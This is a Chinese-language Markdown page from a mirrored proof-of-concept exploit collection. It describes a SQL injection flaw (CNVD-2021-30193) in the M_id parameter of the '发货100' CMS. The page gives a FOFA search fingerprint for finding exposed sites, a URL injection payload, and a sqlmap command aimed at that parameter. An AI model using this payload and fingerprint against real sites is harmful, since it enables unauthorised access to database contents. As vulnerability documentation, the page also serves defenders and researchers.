admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/cms/发货100 M_id SQL注入漏洞 CNVD-2021-30193.md

39 lines
692 B
Markdown
Raw Normal View History

update gitbook
2022-02-20 16:14:31 +08:00
# 发货100 M_id SQL注入漏洞 CNVD-2021-30193
## 漏洞描述
发货100 M_id参数存在SQL注入漏洞 攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
发货100
```
## FOFA
```
icon_hash="1420424513"
```
## 漏洞复现
主页面如下
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170900267.png)
使用POC
```plain
/?M_id=1%27&type=product
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170900051.png)
数据库出现报错, 使用Sqlmap注入
```plain
sqlmap -u 'http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202170900124.png)
Reference in New Issue Copy Permalink